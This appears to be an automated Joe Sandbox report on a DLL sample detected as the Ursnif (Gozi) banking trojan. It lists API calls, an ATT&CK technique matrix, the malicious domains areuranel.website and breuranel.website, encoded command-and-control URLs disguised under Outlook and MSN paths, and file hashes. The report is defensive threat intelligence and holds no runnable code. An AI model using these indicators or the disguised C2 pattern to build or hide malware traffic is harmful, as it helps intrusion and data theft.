                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 500399 | Sample: m87xfb63XU.dll | Start date: 12/10/2021 | Architecture: WINDOWS | Score: 96

Graph nodes and edges (as extracted from the rendered graph):

• Start node: DNS msn.com; signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif
• loaddll32.exe started; contacts breuranel.website, areuranel.website and 9 other IPs or domains; signatures: Writes or reads registry keys via WMI; Writes registry values via WMI; starts rundll32.exe, cmd.exe, rundll32.exe, rundll32.exe
• rundll32.exe (child of loaddll32.exe): System process connects to network (likely due to code injection or exploit); Writes registry values via WMI; starts WerFault.exe
• cmd.exe starts rundll32.exe, which contacts 40.101.60.226, 443, 49789 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 52.97.135.82, 443, 49788 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 10 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
• The two remaining rundll32.exe instances each start WerFault.exe; one WerFault.exe contacts 192.168.2.1 (unknown, unknown)

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
m87xfb63XU.dll | 18% | Virustotal | | Browse
m87xfb63XU.dll | 22% | ReversingLabs | Win32.Infostealer.Gozi |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
3.2.rundll32.exe.2eb0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File
0.2.loaddll32.exe.3030000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 | | Download File

                      Domains

Source | Detection | Scanner | Label | Link
areuranel.website | 7% | Virustotal | | Browse
breuranel.website | 7% | Virustotal | | Browse

                      URLs

Source | Detection | Scanner | Label | Link
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe |
https://watson.telemetry.m | 0% | Avira URL Cloud | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false | | high
outlook.com | 40.97.153.146 | true | false | | high
HHN-efz.ms-acdc.office.com | 52.97.223.66 | true | false | | high
FRA-efz.ms-acdc.office.com | 52.97.151.2 | true | false | | high
www.msn.com | unknown | unknown | false | | high
www.outlook.com | unknown | unknown | false | | high
areuranel.website | unknown | unknown | true | | unknown
breuranel.website | unknown | unknown | true | | unknown
outlook.office365.com | unknown | unknown | false | | high

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://outlook.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre | false | | high
https://outlook.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre | false | | high
https://www.outlook.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre | false | | high
https://outlook.office365.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre | false | | high
https://outlook.office365.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre | false | | high
https://msn.com/mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre | false | | high
https://www.outlook.com/signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre | false | | high

                                                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.msn.com/?refurl=%2fmail%2fliopolo%2fI2vyCwQZ_2BZdOw7_2FC5%2fQHqYyNs8nTjA1r7w%2fN6UkSzFGk | rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | | high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | | high
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://ogp.me/ns# | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | | high
https://watson.telemetry.m | WerFault.exe, 00000013.00000003.567391017.0000000004E8D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://blogs.msn.com/ | loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531809993.00000000055AB000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us//api/modules/fetch" | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | | high
http://ogp.me/ns/fb# | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmp | false | | high
https://www.msn.com/?refurl=%2fmail%2fliopolo%2f881KeBhik38%2fn4I3jisQrsLf3N%2f5T7WW0TVyqLiEqrYpioXw | loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp | false | | high

                                                                Contacted IPs


                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.97.223.66 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.135.82 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
52.97.151.2 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.97.153.146 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.101.60.226 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true

                                                                Private

                                                                IP
                                                                192.168.2.1

                                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500399
Start date: 12.10.2021
Start time: 00:33:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: m87xfb63XU.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@14/12@16/7
EGA Information: Failed
                                                                HDC Information:
                                                                • Successful, ratio: 11.3% (good quality ratio 10.8%)
                                                                • Quality average: 78.9%
                                                                • Quality standard deviation: 28.8%
                                                                HCA Information:
                                                                • Successful, ratio: 61%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                • Found application associated with file extension: .dll
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 8.247.248.223, 8.247.248.249, 8.247.244.221, 93.184.221.240, 20.199.120.182, 20.199.120.151, 20.199.120.85, 20.82.209.183, 204.79.197.203, 40.126.31.137, 40.126.31.139, 40.126.31.6, 20.190.159.136, 40.126.31.4, 20.190.159.132, 40.126.31.141, 20.190.159.138, 20.189.173.20, 20.189.173.22, 2.20.178.33, 2.20.178.24, 52.168.117.173, 20.54.110.249, 52.251.79.25, 40.112.88.60
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, www.tm.lg.prod.aadmsa.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

Time | Type | Description
00:37:41 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
00:37:41 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
52.97.223.66 | 6yDD19jMIu.dll | Get hash | malicious | Browse |
52.97.151.2 | m87xfb63XU.dll | Get hash | malicious | Browse |
40.97.153.146 | test1.dll | Get hash | malicious | Browse |
| 7.dll | Get hash | malicious | Browse |
| nT5pUwoJSS.dll | Get hash | malicious | Browse |
| 5instructio.exe | Get hash | malicious | Browse |
| .exe | Get hash | malicious | Browse |
| 61Documen.exe | Get hash | malicious | Browse |
| 65document.exe | Get hash | malicious | Browse |
| 29mail98@vip.son.exe | Get hash | malicious | Browse |
| 57document.exe | Get hash | malicious | Browse |
13.82.28.61 | 45DOC00111738011537818635391-pdf.exe | Get hash | malicious | Browse | msn.com/

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                      ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | m87xfb63XU.dll | Get hash | malicious | Browse | 52.97.151.66
| 6yDD19jMIu.dll | Get hash | malicious | Browse | 13.82.28.61
| 6yDD19jMIu.dll | Get hash | malicious | Browse | 13.82.28.61
| B6VQd36tt6.dll | Get hash | malicious | Browse | 13.82.28.61
| B6VQd36tt6.dll | Get hash | malicious | Browse | 52.97.183.162
| P2AN3Yrtnz.exe | Get hash | malicious | Browse | 40.93.212.0
| b3astmode.x86 | Get hash | malicious | Browse | 72.154.237.78
| b3astmode.arm7 | Get hash | malicious | Browse | 20.153.181.154
| b3astmode.arm7-20211011-1850 | Get hash | malicious | Browse | 20.63.129.213
| TNIZtb3HS3.exe | Get hash | malicious | Browse | 20.42.65.92
| PROFORMA INVOICE -PI6120..html | Get hash | malicious | Browse | 40.101.62.34
| setup_x86_x64_install.exe | Get hash | malicious | Browse | 52.168.117.173
| ntpclient | Get hash | malicious | Browse | 21.215.78.72
| 2021catalog-selected products.xlsm | Get hash | malicious | Browse | 13.92.100.208
| K6E9636Koq | Get hash | malicious | Browse | 159.27.209.248
| setup_x86_x64_install.exe | Get hash | malicious | Browse | 20.42.73.29
| Hm7d40tE44.exe | Get hash | malicious | Browse | 104.47.53.36
| mixsix_20211008-150045.exe | Get hash | malicious | Browse | 20.189.173.22
| SecuriteInfo.com.W32.AIDetect.malware2.21009.exe | Get hash | malicious | Browse | 104.47.53.36
| in7BcpKNoa.exe | Get hash | malicious | Browse | 40.93.212.0

                                                                                      JA3 Fingerprints

                                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_11c12585\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12044
                                                                                      Entropy (8bit):3.7631398695569955
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:rarTiG0oXOHBUZMX4jed+5/u7sMS274It7cN:ryigXGBUZMX4jeU/u7sMX4It7cN
                                                                                      MD5:2D536796AAB3D133D6417DE1EBC9ACF5
                                                                                      SHA1:34D556E660BD9E46CC271D789C4359C31A7BC377
                                                                                      SHA-256:A68B4D65FD079429FE10408C1E7D6B6B2540D643A6ED3DA40A4B19E0C7DAD5DD
                                                                                      SHA-512:8D65CE6552C1F9E71546B630AC825E1661F691B9E508FAFD0681DDB558150A7CB595EFEB4C29F15AE7CA58752CADE1F3AE7FA9E6C560BDA2606F7E8174149E1A
                                                                                      Malicious:false
                                                                                      Preview: Version=1 EventType=BEX EventTime=132784978723052439 ReportType=2 Consent=1 UploadTime=132784978776646143 ReportStatus=655456 ReportIdentifier=0a18aa67-095b-42ec-abe7-33bd05a31a36 IntegratorReportIdentifier=d5535ec3-d169-42e6-b919-be8312528eea Wow64Host=34404 Wow64Guest=332 NsAppName=rundll32.exe OriginalFilename=RUNDLL32.EXE AppSessionGuid=0000123c-0001-001c-8e8b-a6d23bbfd701 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09b5f!r
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_12494a43\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12038
                                                                                      Entropy (8bit):3.764900859024697
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:KC4iT0oX+HBUZMX4jed+x/u7sMS274It7ca:h4iNX2BUZMX4je8/u7sMX4It7ca
                                                                                      MD5:9B5E9E424EA5CFD77CBF080009E761AB
                                                                                      SHA1:A85C669A2C4820B53803516D9D563A11CE64E6DA
                                                                                      SHA-256:B7FEB953DCE8100B907FC7BADC6CD3B5D853C8634600918BEDB24C5CAE2C529E
                                                                                      SHA-512:EDB1091FACF84E50700F54CE6387EF2F1929A81AE0E830121F19255CFACEE1E501E9DCF33C6F02A647B113D855E2A0335FBE71EBAA324B9E28F94D6D194294CF
                                                                                      Malicious:false
                                                                                      Preview: Version=1 EventType=BEX EventTime=132784978780748318 ReportType=2 Consent=1 UploadTime=132784978873716647 ReportStatus=655456 ReportIdentifier=f5468c6b-37c6-47f0-856f-c6d27220f0ed IntegratorReportIdentifier=82ea376b-e4a8-4022-a997-a50627a34cb8 Wow64Host=34404 Wow64Guest=332 NsAppName=rundll32.exe OriginalFilename=RUNDLL32.EXE AppSessionGuid=000011f4-0001-001c-6fc6-afd43bbfd701 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09b5f!r
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_1bc56378\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12042
                                                                                      Entropy (8bit):3.7655405295675086
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xkmio0oXCHBUZMX4jed+x/u7sMS274It7c6:imiOXaBUZMX4jec/u7sMX4It7c6
                                                                                      MD5:CB53F0494ED32D4398672C2FE4FB77D0
                                                                                      SHA1:08A86732128ECAED018F686C7462976321C4C2B5
                                                                                      SHA-256:675B69B33B8DD77A91E447650DCEC234B7014BA7AD89E9FFAA24DC1B842EC183
                                                                                      SHA-512:05F1464AA7E4894DCD9B4A15E6B841F558B2C8EADE33C4A10C29054D4392B2ED0781C7114EDC3438A328197A32E66B8B1E9C9A024768525649D0FA3F2D4E73A3
                                                                                      Malicious:false
                                                                                      Preview: Version=1 EventType=BEX EventTime=132784978870152883 ReportType=2 Consent=1 UploadTime=132784978940152579 ReportStatus=655456 ReportIdentifier=5049c956-2833-4358-bb2c-e1e183baf42f IntegratorReportIdentifier=8b4e5154-e955-4788-99c3-068035966ee2 Wow64Host=34404 Wow64Guest=332 NsAppName=rundll32.exe OriginalFilename=RUNDLL32.EXE AppSessionGuid=000010fc-0001-001c-13e4-ffd83bbfd701 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09b5f!r
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1133.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8406
                                                                                      Entropy (8bit):3.6963803284121193
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiRjv64uT6YAD66njSCxpOmXgmf8NSqCprP89bbAsf3BJm:RrlsNiVv6nT6YK661xpOmXgmf8NSibTG
                                                                                      MD5:9A49EDBFE578048831C8820692773645
                                                                                      SHA1:F39D5F2D815959F9163B485338B03CC9A9865963
                                                                                      SHA-256:EF794768396D5D452BBF5DC0771328E8A3B9D6CB53402E4628275C4FA46CD39E
                                                                                      SHA-512:2C596404D46A368D7EB36C13BC9C624073DBA4A117FDD284B3F6442009CBE5E05D1F58F8699161CDB58B36FE8B108A48709FB6D7C2975D444329AFDC5649C753
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4668</Pid>
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER13C4.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4771
                                                                                      Entropy (8bit):4.483718466628636
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsXJgtWI9TzWSC8BN58fm8M4JCdsPMFbJ+q8vjsPPX4SrS1d:uITf5UCSNCJd4JKmfDW1d
                                                                                      MD5:CE10A908A63D722AACF0E8D9BE1095F8
                                                                                      SHA1:17A9B4AE2DE575C2D7DAA39045AA4A4573F8198C
                                                                                      SHA-256:C8B824A19D5BB8A8DF2BE2EC44BAF0CD4805236B67701EA6E0829001085E1608
                                                                                      SHA-512:DFE78C8930F027EAEA01E6746E5B53617D636B5580B23E4FEF0CAA9F8A44E4BED39FC3B6386066A6F7CEBBC5CDDAD35D8676DA3BDA8EFB5585C179102087B14A
                                                                                      Malicious:false
